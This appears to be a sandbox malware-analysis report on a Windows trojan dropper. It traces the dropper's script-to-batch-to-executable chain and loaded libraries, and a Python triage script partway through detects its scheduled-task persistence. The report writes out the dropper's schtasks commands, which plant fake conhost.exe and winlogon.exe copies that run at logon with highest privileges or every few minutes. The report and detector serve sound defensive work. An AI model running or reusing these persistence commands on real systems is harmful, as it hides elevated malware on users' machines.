            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087E8A00_2_0087E8A0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008949690_2_00894969
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087F9680_2_0087F968
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00883A3C0_2_00883A3C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00886A7B0_2_00886A7B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00890B430_2_00890B43
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089CB600_2_0089CB60
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00885C770_2_00885C77
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088FDFA0_2_0088FDFA
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087ED140_2_0087ED14
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00883D6D0_2_00883D6D
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087BE130_2_0087BE13
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087DE6C0_2_0087DE6C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00875F3C0_2_00875F3C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00890F780_2_00890F78
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: String function: 0088E28C appears 35 times
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: String function: 0088E360 appears 52 times
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: String function: 0088ED00 appears 31 times
Source: portruntime.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe.5.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe0.5.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe1.5.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: winlogon.exe.5.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe2.5.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: QIKiV83Pkl.exe | Binary or memory string: OriginalFilename libGLESv2.dll4 vs QIKiV83Pkl.exe
Source: QIKiV83Pkl.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.winEXE@39/22@2/2
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Code function: 0_2_00876EC9 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Code function: 0_2_00889E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\Default\conhost.exe
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\53353b0acecc245765fbbf262d53597803ae4f8c
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\user\AppData\Local\Temp\kxib6YnpdJ
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Command line argument: sfxname (0_2_0088D5D4)
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Command line argument: sfxstime (0_2_0088D5D4)
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Command line argument: STARTDLG (0_2_0088D5D4)
Source: QIKiV83Pkl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QIKiV83Pkl.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\brokermonitordhcp\portruntime.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (21 identical events)
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: QIKiV83Pkl.exe | ReversingLabs: Detection: 71%
Source: QIKiV83Pkl.exe | Virustotal: Detection: 59%
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | File read: C:\Users\user\Desktop\QIKiV83Pkl.exe
Source: unknown | Process created: C:\Users\user\Desktop\QIKiV83Pkl.exe "C:\Users\user\Desktop\QIKiV83Pkl.exe"
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: unknown | Process created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
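Added example (not part of the Joe Sandbox report and not the sandbox's own detection code): a small Python triage script that applies the logic behind the "Schedule system process" and "Files With System Process Name In Unsuspected Locations" signatures to the schtasks.exe command lines listed above. It parses each /create invocation and flags three things the dropper does here: a Windows system-process name (conhost.exe, winlogon.exe) scheduled from a directory where that binary never lives, ONLOGON persistence combined with /rl HIGHEST, and minute-interval re-execution that keeps the implant alive (a watchdog). The system-process name list, the expected-directory set, the 15-minute watchdog threshold and the two control lines (a constructed benign task and a non-schtasks command) are the example's own assumptions.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed list: system binaries whose names droppers reuse for their copies
# (the report shows conhost.exe and winlogon.exe dropped under other paths).
SYSTEM_PROCESS_NAMES = {
    "conhost.exe", "winlogon.exe", "csrss.exe", "lsass.exe", "svchost.exe",
    "smss.exe", "services.exe", "wininit.exe", "dwm.exe", "explorer.exe",
}

# Assumed: directories where a binary with one of those names is expected.
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}

# Assumed threshold: re-execution this often or faster is a watchdog pattern.
WATCHDOG_MINUTES = 15

# First three lines are taken from the process list above; the last two are
# constructed controls (a plausible benign task, and a non-schtasks command).
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f''',
    r'''schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "VendorUpdate" /sc DAILY /st 03:00 /tr "'C:\Program Files\Vendor\updater.exe'" /f''',
    r'''"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"''',
]

# Captures the flags we care about; a quoted value may contain spaces.
_FLAG_RE = re.compile(r'/(tn|sc|mo|rl|tr)\s+("[^"]*"|\S+)', re.I)


@dataclass
class TaskCreate:
    name: str
    schedule: str
    modifier: Optional[int]
    run_level: str
    target: str
    findings: List[str] = field(default_factory=list)


def parse_schtasks(cmdline: str) -> Optional[TaskCreate]:
    """Extract /tn, /sc, /mo, /rl and /tr from a 'schtasks /create' command line."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*\s/create\b", cmdline, re.I):
        return None
    fields = {}
    for flag, value in _FLAG_RE.findall(cmdline):
        # The dropper wraps /tr targets in double plus single quotes: "'C:\x.exe'".
        fields[flag.lower()] = value.strip('"').strip("'")
    if "tr" not in fields:
        return None
    mo = fields.get("mo")
    return TaskCreate(
        name=fields.get("tn", ""),
        schedule=fields.get("sc", "").upper(),
        modifier=int(mo) if mo and mo.isdigit() else None,
        run_level=fields.get("rl", "").upper(),
        target=fields["tr"],
    )


def analyse(cmdline: str) -> Optional[TaskCreate]:
    """Return the parsed task with its findings, or None if not a task creation."""
    task = parse_schtasks(cmdline)
    if task is None:
        return None
    base = ntpath.basename(task.target).lower()
    directory = ntpath.dirname(task.target).lower().rstrip("\\")
    if base in SYSTEM_PROCESS_NAMES and directory not in EXPECTED_DIRS:
        task.findings.append(
            f"system process name {base} outside expected directories: {task.target}")
    if task.schedule == "ONLOGON" and task.run_level == "HIGHEST":
        task.findings.append("logon persistence with /rl HIGHEST")
    if task.schedule == "MINUTE" and task.modifier is not None and task.modifier <= WATCHDOG_MINUTES:
        task.findings.append(f"watchdog re-execution every {task.modifier} minutes")
    return task


def triage(cmdlines) -> dict:
    """Map each flagged task name to its findings; clean or non-schtasks lines are skipped."""
    report = {}
    for line in cmdlines:
        task = analyse(line)
        if task is not None and task.findings:
            report[task.name] = task.findings
    return report


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_CMDLINES).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

On this sample set the three dropper tasks are flagged and the two control lines produce nothing. The same parser can be pointed at Sysmon event 1 or Security 4688 command lines; the interesting signal in this report is not /create itself but the combination of a system-process name under C:\Users\Default or an Adobe directory with a minute-interval trigger, which is what the rules above key on.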
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: mscoree.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: apphelp.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: kernel.appcore.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: version.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: uxtheme.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: windows.storage.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: wldp.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: profapi.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: cryptsp.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: rsaenh.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: cryptbase.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: sspicli.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: amsi.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: userenv.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: ntmarta.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: wbemcomn.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: propsys.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: dlnashext.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: wpdshext.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: edputil.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: urlmon.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: iertutil.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: srvcli.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: netutils.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: wintypes.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: appresolver.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: bcp47langs.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: slc.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: sppc.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\brokermonitordhcp\portruntime.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll (each of the 12 schtasks.exe instances)
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll (each of the 12 schtasks.exe instances)
